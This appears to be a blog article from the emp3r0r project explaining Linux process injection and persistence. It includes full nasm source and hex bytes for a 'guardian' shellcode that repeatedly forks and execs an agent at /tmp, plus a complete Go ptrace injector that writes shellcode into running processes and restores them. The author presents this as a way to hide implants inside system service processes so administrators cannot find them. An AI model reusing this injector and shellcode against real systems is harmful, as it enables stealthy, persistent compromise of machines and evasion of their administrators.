emp3r0r - Process Injection And Persistence

Process Injection In Linux

Background

The techniques covered in this article are part of the emp3r0r project.

Linux has something most other platforms lack: procfs. As Unix people like to say, "everything is a file". From /proc/pid/maps we can read a process's memory mappings, and through /proc/pid/mem we can even modify its memory with ease (it's almost the same as modifying an actual file).
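To make the maps format concrete, here is a minimal Go sketch that parses /proc/self/maps and prints the executable regions. The `mapping` type and the `parseMapsLine` helper are names made up for this illustration, not part of emp3r0r.

```go
package main

import (
	"bufio"
	"fmt"
	"os"
	"strconv"
	"strings"
)

// mapping is one parsed line of /proc/<pid>/maps (hypothetical helper type).
type mapping struct {
	Start, End uint64
	Perms      string
	Path       string // empty for anonymous mappings
}

// parseMapsLine parses a line such as
// "00400000-0040b000 r-xp 00000000 08:01 1234 /usr/bin/cat".
func parseMapsLine(line string) (mapping, error) {
	fields := strings.Fields(line)
	if len(fields) < 5 {
		return mapping{}, fmt.Errorf("short maps line: %q", line)
	}
	lo, hi, ok := strings.Cut(fields[0], "-")
	if !ok {
		return mapping{}, fmt.Errorf("bad address range: %q", fields[0])
	}
	start, err := strconv.ParseUint(lo, 16, 64)
	if err != nil {
		return mapping{}, err
	}
	end, err := strconv.ParseUint(hi, 16, 64)
	if err != nil {
		return mapping{}, err
	}
	m := mapping{Start: start, End: end, Perms: fields[1]}
	if len(fields) >= 6 {
		m.Path = strings.Join(fields[5:], " ")
	}
	return m, nil
}

func main() {
	f, err := os.Open("/proc/self/maps")
	if err != nil {
		fmt.Println("open:", err)
		return
	}
	defer f.Close()

	sc := bufio.NewScanner(f)
	for sc.Scan() {
		m, err := parseMapsLine(sc.Text())
		if err != nil {
			continue
		}
		// Only show regions the process is allowed to execute.
		if strings.Contains(m.Perms, "x") {
			fmt.Printf("%x-%x %s %s\n", m.Start, m.End, m.Perms, m.Path)
		}
	}
}
```

Replace "self" with a PID to inspect another process, provided you have permission to read its maps file.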

In theory, we can inject code into arbitrary processes with nothing but procfs and dd. There is even a PoC project if you search for it.

But since Linux provides a proper interface for tampering with processes, we will use it whenever possible.

Unlike Windows, Linux has one and only one API for process tampering, and it is

ptrace

Yeah, it's ptrace.

Then how do we inject code with ptrace?

PTRACE_ATTACH to the target process, thus taking control of it
Back up the registers and the code at RIP, then PTRACE_POKETEXT your shellcode where RIP is pointing
Resume the process with PTRACE_CONT
The shellcode runs until its int 3 trap, at which point the process stops and gives control back to us
We restore the backed-up code, along with the registers
The process carries on as if nothing had ever happened

Restore injected process

It looks easy, doesn't it?

But it's not. The process may or may not recover; it all depends on the shellcode itself. Restoring the code and registers is not enough if your shellcode has messed up the stack as well.

You also don't want the shellcode to block the main thread. If it did, we would no longer be talking about process recovery, we would be talking about execve.

Yes, some shellcode calls execve in the current process, which makes the original process gone for good.

Therefore, we will just fork a new child, and put our shellcode in it.

You can use clone as well; it doesn't make much difference.

Linux x64 shellcode 101

It's actually a 101 for myself, as I have never written any shellcode before.

With DuckDuckGo and some help from the AOSC Linux folks, I was able to roll out my own "hello world" shellcode.

It's much more than a "hello world", it's a guardian shellcode.

How

What language

Of course you write assembly to get your shellcode, that's what it is.

But with the help of a C compiler, the job can be done more quickly, as recommended by a friend:

[Figure: c-shellcode]

As you can see in the code, char buf[] takes care of our "Hello World\n" string data, we don't need to worry about stack allocation anymore.

This article, however, takes the traditional assembly route, as I want to learn it.

What editor

I would use vim.

And nasm as the assembler.

I avoid section .data because it introduces more \0 bytes.

A nasm skeleton targeting x86_64:

BITS 64
global _start

section .text
_start:
    ...your code...

global _start plays the role of main: it exports the entry point for the linker. BITS 64 tells nasm to generate 64-bit code.

hex string

You have to assemble your code into raw bytes:

❯ nasm yourshellcode.asm -o shellcode.bin

And raw bytes to hex string:

❯ xxd -i shellcode.bin | grep 0x | tr -d '[:space:]' | tr -d ',' | sed 's/0x/\\x/g'
\x48\x31\xc0\x48\x31\xff\xb0\x39\x0f\x05\x48\x83\xf8\x00\x7f\x5e\x48\x31\xc0\x48\x31\xff\xb0\x39\x0f\x05\x48\x83\xf8\x00\x74\x2c\x48\x31\xff\x48\x89\xc7\x48\x31\xf6\x48\x31\xd2\x4d\x31\xd2\x48\x31\xc0\xb0\x3d\x0f\x05\x48\x31\xc0\xb0\x23\x6a\x0a\x6a\x14\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05\xe2\xc4\x48\x31\xd2\x52\x48\x31\xc0\x48\xbf\x2f\x2f\x74\x6d\x70\x2f\x2f\x65\x57\x54\x5f\x48\x89\xe7\x52\x57\x48\x89\xe6\x6a\x3b\x58\x99\x0f\x05\xcd\x03

With rax2:

❯ rax2 -S < shellcode.bin
4831c04831ffb0390f054883f8007f5e4831c04831ffb0390f054883f800742c4831ff4889c74831f64831d24d31d24831c0b03d0f054831c0b0236a0a6a144889e74831f64831d20f05e2c44831d2524831c048bf2f2f746d702f2f6557545f4889e752574889e66a3b58990f05cd03

rax2 is part of radare2.
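If you would rather do the conversion in code, here is a small Go sketch that produces the `\x..` form from raw bytes and decodes either form back. `escapeBytes` and `decodeShellcode` are hypothetical helper names, and the five sample bytes are just the first instruction of the shellcode plus a syscall.

```go
package main

import (
	"encoding/hex"
	"fmt"
	"strings"
)

// escapeBytes renders raw bytes as a "\x48\x31..." string,
// the same shape the xxd pipeline prints.
func escapeBytes(raw []byte) string {
	var b strings.Builder
	for _, c := range raw {
		fmt.Fprintf(&b, `\x%02x`, c)
	}
	return b.String()
}

// decodeShellcode accepts either the "\x48\x31" form or the plain
// "4831" form printed by rax2 -S and returns the raw bytes.
func decodeShellcode(s string) ([]byte, error) {
	s = strings.ReplaceAll(s, `\x`, "")
	return hex.DecodeString(strings.TrimSpace(s))
}

func main() {
	raw := []byte{0x48, 0x31, 0xc0, 0x0f, 0x05} // xor rax, rax; syscall
	esc := escapeBytes(raw)
	fmt.Println(esc)

	back, err := decodeShellcode(esc)
	if err != nil {
		fmt.Println("decode:", err)
		return
	}
	fmt.Println(hex.EncodeToString(back))
}
```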

syscall

syscall NR

What is a syscall?

Why is it prefixed with NR? I looked it up, and it seems to be an abbreviation of Numeric Reference.

You give Linux an NR to let it know which syscall you are calling.

Here's a complete syscall table for Linux.

Note that syscall numbers differ between architectures.

We care about x86_64 only. BTW, why would you even consider writing 32-bit x86 assembly for Linux? It's 2021, guys; x86 has been deprecated for something like ten years!

Calling convention

Calling a syscall is no different from calling any other function; it's just that we have to do it in assembly, without the C compiler's help.

This means we need to set up the arguments manually. That is not easy for certain syscalls, but the pattern is always the same:

[Figure: syscall-call]

For x86_64, you put the syscall NR into RAX and the arguments into RDI, RSI, RDX, R10, R8 and R9, then execute the syscall instruction. (This is not the same as the legacy 32-bit int 0x80 interface, which uses different numbers and registers.) RAX holds the return value once the call is done.

Some syscall arguments are pointers, so you need to pass addresses (instead of data) to them.

A guardian shellcode

This shellcode is part of emp3r0r.

Some tips:

When a pointer is required, push your data onto the stack, then pass the RSP value
push takes an immediate of at most 4 bytes; if you need to push more than 4 bytes, store them in a register and push the register instead
Terminate char arrays and string arrays with \0, which you push first
Don't use reserved words as label names, for example, wait

If you are not using nasm, these tips may not apply to you.

And:

Why wait? Because we end up with zombie children if we don't
Why fork twice? Because execve replaces current process with a new image
Why sleep? Because we don't want the CPU to fly
Why int 0x3? Because we have to pause (trap) the shellcode in order to restore the process

    BITS 64

    section .text
    global  _start

_start:
    ;;  fork
    xor rax, rax
    xor rdi, rdi
    mov al, 0x39; syscall fork
    syscall

    cmp rax, 0x0; check return value
    jg  pause; int3 if in parent

watchdog:
    ;;  fork to exec agent
    xor rax, rax
    xor rdi, rdi
    mov al, 0x39; syscall fork
    syscall
    cmp rax, 0x0; check return value
    je  exec; exec if in child

wait4zombie:
    ;;  wait to clean up zombies
    xor rdi, rdi
    mov rdi, rax
    xor rsi, rsi
    xor rdx, rdx
    xor r10, r10
    xor rax, rax
    mov al, 0x3d
    syscall

sleep:
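    ;;   sleep
    xor  rax, rax
    mov  al, 0x23; syscall nanosleep
    push 10; tv_nsec = 10 nanoseconds
    push 20; tv_sec = 20 seconds
    mov  rdi, rsp; rdi = pointer to struct timespec
    xor  rsi, rsi
    xor  rdx, rdx
    syscall
    loop watchdog; dec rcx, jump if non-zero (syscall leaves the return address in rcx)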

exec:
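    ;;   NULL qword, doubles as the terminator of the filename string
    xor  rdx, rdx
    push rdx; '\0'

    ;;   char *filename
    xor  rax, rax
    mov  rdi, 0x652f2f706d742f2f; "//tmp//e" in little-endian, path to the executable
    push rdi; save to stack
    push rsp
    pop  rdi; rdi = pointer to the filename
    mov  rdi, rsp; you can delete this as it does nothing

    ;;   char **argv
    push rdx; NULL terminator of argv
    push rdi; argv[0] = filename
    mov  rsi, rsp; rsi = argv

    push 0x3b; syscall execve
    pop  rax; ready to call
    cdq; sign-extend eax into edx, so rdx (envp) = NULL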
    syscall

pause:
    ;;  trap
    int 0x3
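The 64-bit immediate loaded into rdi is just the path string read as a little-endian integer, which is why the path is exactly 8 bytes long (the doubled slashes act as padding, and the kernel treats them as a single slash). A small Go sketch makes the round trip explicit; `packPath` and `unpackPath` are hypothetical helpers for illustration.

```go
package main

import (
	"encoding/binary"
	"fmt"
)

// packPath turns an 8-byte path into the 64-bit immediate that
// `mov rdi, imm64` would load, so that pushing the register lays the
// bytes out in memory in string order.
func packPath(path string) (uint64, error) {
	if len(path) != 8 {
		return 0, fmt.Errorf("path must be exactly 8 bytes, got %d", len(path))
	}
	return binary.LittleEndian.Uint64([]byte(path)), nil
}

// unpackPath is the inverse: it shows which string an immediate encodes.
func unpackPath(imm uint64) string {
	var b [8]byte
	binary.LittleEndian.PutUint64(b[:], imm)
	return string(b[:])
}

func main() {
	fmt.Println(unpackPath(0x652f2f706d742f2f))

	imm, err := packPath("//tmp//e")
	if err != nil {
		fmt.Println(err)
		return
	}
	fmt.Printf("0x%x\n", imm)
}
```

Running it prints `//tmp//e` followed by `0x652f2f706d742f2f`, matching the constant in the exec block.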

Weaponize it

Inject shellcode

emp3r0r automatically injects the guardian shellcode into common processes:

[Figure: inject]

Now we have a bunch of guardian code running inside the target system's service processes. That is a disaster for system admins, as they can hardly find where the hell our guardian angel hides until they reboot the whole system.

If you are interested, write some shellcode of your own to play with.

So how do we inject? Here's emp3r0r's approach:

// Injector inject shellcode to arbitrary running process
// target process will be restored after shellcode has done its job
func Injector(shellcode *string, pid int) error {
    // format
    *shellcode = strings.Replace(*shellcode, ",", "", -1)
    *shellcode = strings.Replace(*shellcode, "0x", "", -1)
    *shellcode = strings.Replace(*shellcode, "\\x", "", -1)

    // decode hex shellcode string
    sc, err := hex.DecodeString(*shellcode)
    if err != nil {
        return fmt.Errorf("Decode shellcode: %v", err)
    }

    // inject to an existing process or start a new one
    // check /proc/sys/kernel/yama/ptrace_scope if you can't inject into existing processes
    if pid == 0 {
        // start a child process to inject shellcode into
        sec := strconv.Itoa(RandInt(10, 30))
        child := exec.Command("sleep", sec)
        child.SysProcAttr = &syscall.SysProcAttr{Ptrace: true}
        err = child.Start()
        if err != nil {
            return fmt.Errorf("Start `sleep %s`: %v", sec, err)
        }
        pid = child.Process.Pid

        // attach
        err = child.Wait() // TRAP the child
        if err != nil {
            log.Printf("child process wait: %v", err)
        }
        log.Printf("Injector (%d): attached to child process (%d)", os.Getpid(), pid)
    } else {
        // attach to an existing process
        proc, err := os.FindProcess(pid)
        if err != nil {
            return fmt.Errorf("%d does not exist: %v", pid, err)
        }
        pid = proc.Pid

        // https://github.com/golang/go/issues/43685
        runtime.LockOSThread()
        defer runtime.UnlockOSThread()
        err = syscall.PtraceAttach(pid)
        if err != nil {
            return fmt.Errorf("ptrace attach: %v", err)
        }
        _, err = proc.Wait()
        if err != nil {
            return fmt.Errorf("Wait %d: %v", pid, err)
        }
        log.Printf("Injector (%d): attached to %d", os.Getpid(), pid)
    }

    // read RIP
    origRegs := &syscall.PtraceRegs{}
    err = syscall.PtraceGetRegs(pid, origRegs)
    if err != nil {
        return fmt.Errorf("my pid is %d, reading regs from %d: %v", os.Getpid(), pid, err)
    }
    origRip := origRegs.Rip
    log.Printf("Injector: got RIP (0x%x) of %d", origRip, pid)

    // save current code for restoring later
    origCode := make([]byte, len(sc))
    n, err := syscall.PtracePeekText(pid, uintptr(origRip), origCode)
    if err != nil {
        return fmt.Errorf("PEEK at 0x%x: %v", origRip, err)
    }
    log.Printf("Peeked %d bytes of original code: %x at RIP (0x%x)", n, origCode, origRip)

    // write shellcode to .text section, where RIP is pointing at
    data := sc
    n, err = syscall.PtracePokeText(pid, uintptr(origRip), data)
    if err != nil {
        return fmt.Errorf("POKE_TEXT at 0x%x %d: %v", uintptr(origRip), pid, err)
    }
    log.Printf("Injected %d bytes at RIP (0x%x)", n, origRip)

    // peek: see if shellcode has got injected
    peekWord := make([]byte, len(data))
    n, err = syscall.PtracePeekText(pid, uintptr(origRip), peekWord)
    if err != nil {
        return fmt.Errorf("PEEK at 0x%x: %v", origRip, err)
    }
    log.Printf("Peeked %d bytes of shellcode: %x at RIP (0x%x)", n, peekWord, origRip)

    // continue and wait
    err = syscall.PtraceCont(pid, 0)
    if err != nil {
        return fmt.Errorf("Continue: %v", err)
    }
    var ws syscall.WaitStatus
    _, err = syscall.Wait4(pid, &ws, 0, nil)
    if err != nil {
        return fmt.Errorf("continue: wait4: %v", err)
    }

    // what happened to our child?
    switch {
    case ws.Continued():
        return nil
    case ws.CoreDump():
        err = syscall.PtraceGetRegs(pid, origRegs)
        if err != nil {
            return fmt.Errorf("read regs from %d: %v", pid, err)
        }
        return fmt.Errorf("continue: core dumped: RIP at 0x%x", origRegs.Rip)
    case ws.Exited():
        return nil
    case ws.Signaled():
        err = syscall.PtraceGetRegs(pid, origRegs)
        if err != nil {
            return fmt.Errorf("read regs from %d: %v", pid, err)
        }
        return fmt.Errorf("continue: signaled (%s): RIP at 0x%x", ws.Signal(), origRegs.Rip)
    case ws.Stopped():
        stoppedRegs := &syscall.PtraceRegs{}
        err = syscall.PtraceGetRegs(pid, stoppedRegs)
        if err != nil {
            return fmt.Errorf("read regs from %d: %v", pid, err)
        }
        log.Printf("Continue: stopped (%s): RIP at 0x%x", ws.StopSignal().String(), stoppedRegs.Rip)

        // restore registers
        err = syscall.PtraceSetRegs(pid, origRegs)
        if err != nil {
            return fmt.Errorf("Restoring process: set regs: %v", err)
        }

        // breakpoint hit, restore the process
        n, err = syscall.PtracePokeText(pid, uintptr(origRip), origCode)
        if err != nil {
            return fmt.Errorf("POKE_TEXT at 0x%x %d: %v", uintptr(origRip), pid, err)
        }
        log.Printf("Restored %d bytes at origRip (0x%x)", n, origRip)

        // let it run
        err = syscall.PtraceDetach(pid)
        if err != nil {
            return fmt.Errorf("Continue detach: %v", err)
        }
        log.Printf("%d will continue to run", pid)

        return nil
    default:
        err = syscall.PtraceGetRegs(pid, origRegs)
        if err != nil {
            return fmt.Errorf("read regs from %d: %v", pid, err)
        }
        log.Printf("continue: RIP at 0x%x", origRegs.Rip)
    }

    return nil
}

This is probably the first ptrace-based Linux process injection tool written in pure Go.

Several things to notice if you want to build your own:

Go's syscall wrappers are undocumented
ptrace requests have to stay on one thread, otherwise you lose your tracee; this is a Linux/Unix constraint
but it's also a Go issue, as Go loves goroutines, which can move between threads. I had to call runtime.LockOSThread() before any syscall.Ptrace* call to solve this

I would like to give Go a medal for its PTRACE_POKETEXT and PTRACE_PEEKTEXT wrappers, because not having to peek/poke one word at a time is such a relief for lazy users like me.
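To see what the wrappers spare you, here is a rough sketch of the bookkeeping a word-at-a-time poke needs on x86_64: the payload is cut into 8-byte words, and the last word is padded with the bytes already in memory so nothing past the payload changes. This is an illustration of the general idea, not a description of how Go implements it; `toWords` is a hypothetical helper and no ptrace call is made.

```go
package main

import (
	"encoding/binary"
	"fmt"
)

const wordSize = 8 // one ptrace word on x86_64

// toWords splits data into the 8-byte words that individual
// PTRACE_POKETEXT requests would write. orig holds the bytes currently
// at the target address; it pads the last word so that bytes past the
// end of data are written back unchanged.
func toWords(data, orig []byte) ([]uint64, error) {
	padded := (len(data) + wordSize - 1) / wordSize * wordSize
	if len(orig) < padded {
		return nil, fmt.Errorf("need %d original bytes, got %d", padded, len(orig))
	}
	buf := make([]byte, padded)
	copy(buf, orig[:padded])
	copy(buf, data)

	words := make([]uint64, 0, padded/wordSize)
	for i := 0; i < padded; i += wordSize {
		words = append(words, binary.LittleEndian.Uint64(buf[i:i+wordSize]))
	}
	return words, nil
}

func main() {
	data := []byte{1, 2, 3, 4, 5, 6, 7, 8, 9, 10} // 10 bytes: one full word plus 2 bytes
	orig := make([]byte, 16)
	for i := range orig {
		orig[i] = 0xff // pretend this is what PEEKTEXT returned
	}
	words, err := toWords(data, orig)
	if err != nil {
		fmt.Println(err)
		return
	}
	for i, w := range words {
		fmt.Printf("word %d: 0x%016x\n", i, w)
	}
}
```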

The key point here is int 0x3: it causes the current process to pause (trap) and gives its tracer full control, and that's when we start to restore the original process.

Get persistence with shellcode

Injecting the guardian shellcode into some important service processes is a better way to get "persistence".

It's hard to get caught, and easy to resurrect our agent.

Here is a simple sleep demo program, which we will inject into.

/*
 * This program is used to check shellcode injection
 * */

#include <stdio.h>
#include <time.h>
#include <unistd.h>

int main(int argc, char* argv[])
{
    time_t rawtime;
    struct tm* timeinfo;

    while (1) {
        sleep(1);
        time(&rawtime);
        timeinfo = localtime(&rawtime);
        printf("%s: sleeping\n", asctime(timeinfo));
    }
    return 0;
}

The sleep program sleeps on, with a new child process to guard our agent.

[Figure: demo]

jm33_ng